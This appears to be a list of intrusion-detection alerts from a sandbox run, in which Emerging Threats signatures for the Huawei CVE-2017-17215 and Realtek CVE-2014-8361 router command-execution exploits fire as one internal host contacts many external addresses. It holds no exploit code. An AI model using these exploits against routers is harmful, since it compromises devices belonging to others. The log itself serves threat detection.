                                                07/20/24-23:05:56.011461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737637215192.168.2.14157.2.219.103
                                                07/20/24-23:05:34.657263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783037215192.168.2.14157.89.217.112
                                                07/20/24-23:06:17.661736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4622852869192.168.2.1493.1.194.191
                                                07/20/24-23:05:57.432998TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23314652869192.168.2.14155.180.189.24
                                                07/20/24-23:05:57.811975TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613285052869192.168.2.1418.150.67.241
                                                07/20/24-23:05:45.424850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565637215192.168.2.1441.125.192.22
                                                07/20/24-23:06:17.709098TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24406452869192.168.2.1459.45.228.144
                                                07/20/24-23:05:37.480940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6086652869192.168.2.14207.229.195.229
                                                07/20/24-23:05:37.524062TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25675852869192.168.2.1493.120.173.5
                                                07/20/24-23:05:57.123864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4308652869192.168.2.14151.37.89.93
                                                07/20/24-23:05:42.257476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3833637215192.168.2.1441.50.5.23
                                                07/20/24-23:05:48.244983TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614603452869192.168.2.1425.15.58.154
                                                07/20/24-23:05:47.561552TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615950452869192.168.2.14151.208.74.251
                                                07/20/24-23:06:12.329747TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4702252869192.168.2.14160.71.233.132
                                                07/20/24-23:05:58.662427TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614919652869192.168.2.1443.68.128.224
                                                07/20/24-23:05:45.424850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704037215192.168.2.14197.153.115.91
                                                07/20/24-23:06:16.552344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839637215192.168.2.1441.72.188.89
                                                07/20/24-23:05:34.626588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613437215192.168.2.1441.205.179.211
                                                07/20/24-23:05:39.282126TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614373252869192.168.2.1427.50.141.50
                                                07/20/24-23:05:36.325773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4618037215192.168.2.14125.15.129.89
                                                07/20/24-23:05:45.681680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615571652869192.168.2.14157.170.39.12
                                                07/20/24-23:05:52.575727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6030052869192.168.2.14172.124.74.59
                                                07/20/24-23:06:01.160884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3921852869192.168.2.1441.186.134.72
                                                07/20/24-23:07:02.655350TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614742052869192.168.2.1471.167.69.80
                                                07/20/24-23:06:13.319028TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5514052869192.168.2.1478.50.122.206
                                                07/20/24-23:06:01.275898TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23506252869192.168.2.14122.77.226.22
                                                07/20/24-23:05:38.820643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3547452869192.168.2.14193.96.47.59
                                                07/20/24-23:05:38.939891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926037215192.168.2.1441.215.43.147
                                                07/20/24-23:05:35.800738TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613281452869192.168.2.14205.8.145.6
                                                07/20/24-23:05:59.333908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3772252869192.168.2.1453.235.185.131
                                                07/20/24-23:05:56.993750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5133852869192.168.2.14195.123.119.195
                                                07/20/24-23:05:57.960840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5855452869192.168.2.1496.122.149.45
                                                07/20/24-23:05:45.412130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521837215192.168.2.1441.189.208.29
                                                07/20/24-23:05:56.994181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613638652869192.168.2.14193.66.175.30
                                                07/20/24-23:05:35.752175TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5250852869192.168.2.14217.161.186.84
                                                07/20/24-23:06:05.627003TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615215052869192.168.2.1419.252.110.104
                                                07/20/24-23:05:52.557906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4126052869192.168.2.14189.78.230.222
                                                07/20/24-23:05:52.531088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6059852869192.168.2.14170.66.204.146
                                                07/20/24-23:05:45.439166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315437215192.168.2.14130.5.25.9
                                                07/20/24-23:05:37.549791TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25234052869192.168.2.14143.165.147.195
                                                07/20/24-23:05:46.113321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839037215192.168.2.14197.133.63.148
                                                07/20/24-23:05:57.171385TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615360252869192.168.2.1498.243.190.82
                                                07/20/24-23:06:07.406980TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3695852869192.168.2.1487.139.214.58
                                                07/20/24-23:05:57.702462TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615751052869192.168.2.1418.206.106.65
                                                07/20/24-23:05:39.930490TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613685052869192.168.2.1473.48.25.59
                                                07/20/24-23:05:45.437584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459837215192.168.2.145.217.123.52
                                                07/20/24-23:06:14.614128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3420852869192.168.2.1497.55.184.51
                                                07/20/24-23:05:59.102064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4561052869192.168.2.1438.8.232.207
                                                07/20/24-23:05:48.795527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4399437215192.168.2.1441.17.243.43
                                                07/20/24-23:05:40.330485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4026252869192.168.2.14106.241.87.67
                                                07/20/24-23:05:36.045135TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4905852869192.168.2.1477.237.114.164
                                                07/20/24-23:05:42.238265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807037215192.168.2.14197.208.46.11
                                                07/20/24-23:05:56.106041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598037215192.168.2.14170.201.20.31
                                                07/20/24-23:05:47.101729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977037215192.168.2.1482.180.170.65
                                                07/20/24-23:05:59.348370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5124252869192.168.2.1460.207.166.164
                                                07/20/24-23:05:36.327822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176637215192.168.2.14157.199.126.73
                                                07/20/24-23:05:39.047547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577037215192.168.2.14197.14.104.106
                                                07/20/24-23:05:34.662338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840237215192.168.2.1461.98.235.91
                                                07/20/24-23:05:37.440953TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23937452869192.168.2.1475.120.116.239
                                                07/20/24-23:06:01.325013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24099652869192.168.2.14142.195.29.141
                                                07/20/24-23:06:23.161234TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24145652869192.168.2.14219.131.134.237
                                                07/20/24-23:05:35.241442TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615443452869192.168.2.14162.190.144.241
                                                07/20/24-23:05:36.354742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3487237215192.168.2.1476.110.225.69
                                                07/20/24-23:06:00.933404TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3658252869192.168.2.14111.105.141.17
                                                07/20/24-23:05:47.012420TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615995652869192.168.2.14197.130.252.234
                                                07/20/24-23:05:38.478783TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3420252869192.168.2.1412.103.8.219
                                                07/20/24-23:06:00.649436TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25803252869192.168.2.14218.181.218.187
                                                07/20/24-23:05:38.470683TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3656252869192.168.2.1454.192.129.153
                                                07/20/24-23:05:46.302433TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4231252869192.168.2.14132.178.41.100
                                                07/20/24-23:05:46.780012TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615790052869192.168.2.1434.65.144.238
                                                07/20/24-23:06:38.736451TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614067052869192.168.2.1467.89.77.75
                                                07/20/24-23:06:50.079146TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25491652869192.168.2.1448.215.144.137
                                                07/20/24-23:05:45.297601TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4703452869192.168.2.14161.118.217.155
                                                07/20/24-23:05:57.149453TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5056052869192.168.2.14222.129.233.119
                                                07/20/24-23:06:08.171917TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5924052869192.168.2.14192.204.183.84
                                                07/20/24-23:05:46.308037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4355252869192.168.2.1494.25.11.127
                                                07/20/24-23:05:48.876892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873237215192.168.2.14157.47.128.125
                                                07/20/24-23:06:21.790299TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4722452869192.168.2.1483.126.117.245
                                                07/20/24-23:05:38.235364TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614704252869192.168.2.14200.224.172.161
                                                07/20/24-23:06:15.435068TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614338652869192.168.2.1444.110.25.85
                                                07/20/24-23:05:36.598734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237037215192.168.2.1441.125.214.40
                                                07/20/24-23:05:45.409134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236237215192.168.2.1441.230.134.37
                                                07/20/24-23:06:31.730220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5106052869192.168.2.1436.116.106.59
                                                07/20/24-23:06:09.667246TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615725852869192.168.2.1458.16.41.243
                                                07/20/24-23:06:17.337182TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24137452869192.168.2.14198.203.207.18
                                                07/20/24-23:06:34.627679TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614936052869192.168.2.1469.67.122.17
                                                07/20/24-23:05:40.334659TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23434252869192.168.2.14166.187.21.85
                                                07/20/24-23:05:48.788274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694237215192.168.2.14197.16.194.126
                                                07/20/24-23:05:57.594101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3408452869192.168.2.14221.233.85.98
                                                07/20/24-23:05:57.540063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4581052869192.168.2.14205.22.105.116
                                                07/20/24-23:05:39.047547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297037215192.168.2.1441.231.61.229
                                                07/20/24-23:05:48.876892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334237215192.168.2.14197.190.111.69
                                                07/20/24-23:05:59.967879TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23850452869192.168.2.14200.129.145.85
                                                07/20/24-23:06:16.903590TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5923852869192.168.2.14142.226.102.135
                                                07/20/24-23:05:46.287260TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613316852869192.168.2.1427.61.113.9
                                                07/20/24-23:06:00.427147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497637215192.168.2.14197.193.127.78
                                                07/20/24-23:05:33.829338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461237215192.168.2.14197.152.207.21
                                                07/20/24-23:05:37.489810TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5222252869192.168.2.14105.87.255.111
                                                07/20/24-23:05:56.993302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3931052869192.168.2.14130.98.61.37
                                                07/20/24-23:06:43.392497TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614702452869192.168.2.1495.121.126.32
                                                07/20/24-23:05:45.416560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5647837215192.168.2.14197.166.98.215
                                                07/20/24-23:05:36.241970TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615677852869192.168.2.1478.129.211.10
                                                07/20/24-23:06:11.279918TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613680252869192.168.2.14114.47.146.27
                                                07/20/24-23:05:46.088778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4896037215192.168.2.14197.86.82.234
                                                07/20/24-23:06:14.441698TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3974252869192.168.2.14194.12.165.29
                                                07/20/24-23:05:35.607616TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3621652869192.168.2.1443.124.228.32
                                                07/20/24-23:06:06.458215TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615127652869192.168.2.1498.107.150.15
                                                07/20/24-23:06:15.418646TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3672052869192.168.2.1474.205.40.173
                                                07/20/24-23:06:15.005197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5722252869192.168.2.14216.122.26.226
                                                07/20/24-23:05:35.767909TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5387052869192.168.2.1431.182.192.107
                                                07/20/24-23:05:35.223853TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613806852869192.168.2.14190.231.104.96
                                                07/20/24-23:06:09.712957TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614333452869192.168.2.1488.83.89.231
                                                07/20/24-23:05:33.857328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932037215192.168.2.1491.98.242.170
                                                07/20/24-23:05:39.791998TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3831452869192.168.2.1454.215.17.180
                                                07/20/24-23:06:06.191841TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615997452869192.168.2.1485.226.212.53
                                                07/20/24-23:05:59.471230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5395652869192.168.2.14203.215.159.116
                                                07/20/24-23:05:52.468494TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24385852869192.168.2.148.32.165.235
                                                07/20/24-23:05:57.802006TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3831852869192.168.2.14113.89.22.57
                                                07/20/24-23:06:00.677656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615437215192.168.2.14197.158.173.181
                                                07/20/24-23:05:36.325773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221437215192.168.2.1449.254.13.12
                                                07/20/24-23:05:59.339081TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613614852869192.168.2.14101.195.118.86
                                                07/20/24-23:05:59.080968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25113452869192.168.2.144.132.146.66
                                                07/20/24-23:06:27.950361TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3513052869192.168.2.14142.198.37.15
                                                07/20/24-23:06:05.219605TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614229852869192.168.2.1498.99.33.62
                                                07/20/24-23:07:37.315997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090837215192.168.2.14197.203.48.230
                                                07/20/24-23:06:50.419958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5006052869192.168.2.1491.205.183.206
                                                07/20/24-23:05:36.532921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887237215192.168.2.1441.87.18.27
                                                07/20/24-23:05:37.442743TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5302252869192.168.2.14154.57.81.200
                                                07/20/24-23:06:15.664505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4518652869192.168.2.14206.201.63.188
                                                07/20/24-23:05:33.828884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771637215192.168.2.14197.164.23.3
                                                07/20/24-23:06:14.277885TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25321252869192.168.2.14137.66.165.24
                                                07/20/24-23:05:34.653253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333837215192.168.2.14197.144.99.86
                                                07/20/24-23:05:45.359662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035237215192.168.2.14157.90.111.171
                                                07/20/24-23:05:59.106701TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5128052869192.168.2.1471.121.141.254
                                                07/20/24-23:05:39.159544TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4309452869192.168.2.1450.25.2.217
                                                07/20/24-23:05:40.407056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4570852869192.168.2.14121.164.80.162
                                                07/20/24-23:05:50.501247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287037215192.168.2.14157.132.69.1
                                                07/20/24-23:06:00.037207TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614959452869192.168.2.14190.242.197.218
                                                07/20/24-23:05:38.127633TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613292852869192.168.2.14176.44.128.80
                                                07/20/24-23:05:50.533759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4151037215192.168.2.14157.221.168.58
                                                07/20/24-23:05:42.220682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3546237215192.168.2.14156.222.96.172
                                                07/20/24-23:06:00.163232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5757052869192.168.2.1490.210.129.8
                                                07/20/24-23:05:47.120793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367637215192.168.2.14197.108.149.161
                                                07/20/24-23:05:59.834038TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6047252869192.168.2.14169.23.32.227
                                                07/20/24-23:05:39.324403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5010852869192.168.2.14142.238.12.119
                                                07/20/24-23:06:15.063003TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613868052869192.168.2.1460.32.244.232
                                                07/20/24-23:05:59.128245TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24804052869192.168.2.1484.100.131.64
                                                07/20/24-23:05:39.592985TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615057652869192.168.2.1417.102.178.46
                                                07/20/24-23:05:56.430020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4961837215192.168.2.1441.227.39.152
                                                07/20/24-23:05:57.526744TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4870252869192.168.2.14129.14.146.10
                                                07/20/24-23:05:59.708489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5422652869192.168.2.1447.169.160.149
                                                07/20/24-23:05:57.148116TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25219052869192.168.2.14195.123.119.195
                                                07/20/24-23:06:16.718290TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3694452869192.168.2.1496.167.164.193
                                                07/20/24-23:06:29.745087TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5664252869192.168.2.1412.167.125.66
                                                07/20/24-23:05:33.830570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5609237215192.168.2.1441.248.234.133
                                                07/20/24-23:05:50.498027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507637215192.168.2.1441.206.197.130
                                                07/20/24-23:05:57.974933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3653052869192.168.2.14100.47.215.113
                                                07/20/24-23:06:56.793781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4248652869192.168.2.1420.37.182.77
                                                07/20/24-23:05:47.352326TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615586052869192.168.2.14135.180.161.252
                                                07/20/24-23:06:34.155225TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23503252869192.168.2.14212.103.129.230
                                                07/20/24-23:05:46.718788TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615368852869192.168.2.1460.4.213.153
                                                07/20/24-23:05:36.338927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325237215192.168.2.14157.173.188.51
                                                07/20/24-23:05:56.022964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244837215192.168.2.1441.112.178.181
                                                07/20/24-23:05:56.137269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705637215192.168.2.1441.242.177.178
                                                07/20/24-23:05:57.844842TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614089252869192.168.2.1457.248.59.177
                                                07/20/24-23:06:01.446118TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5856252869192.168.2.14211.231.173.53
                                                07/20/24-23:05:59.197388TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25030652869192.168.2.1494.49.228.97
                                                07/20/24-23:06:12.663367TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615886052869192.168.2.1427.172.117.243
                                                07/20/24-23:05:37.449068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4622452869192.168.2.1464.104.54.14
                                                07/20/24-23:06:01.250185TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614770652869192.168.2.1417.60.150.214
                                                07/20/24-23:05:57.797060TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3758452869192.168.2.14100.254.105.120
                                                07/20/24-23:06:00.483549TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613560852869192.168.2.1489.202.192.181
                                                07/20/24-23:05:44.951018TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4213052869192.168.2.14222.57.120.201
                                                07/20/24-23:05:57.029235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4760452869192.168.2.1498.81.150.61
                                                07/20/24-23:05:37.441224TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5774052869192.168.2.1462.5.163.114
                                                07/20/24-23:05:37.469321TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23699252869192.168.2.14184.126.92.19
                                                07/20/24-23:06:04.098403TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616087252869192.168.2.1435.126.110.108
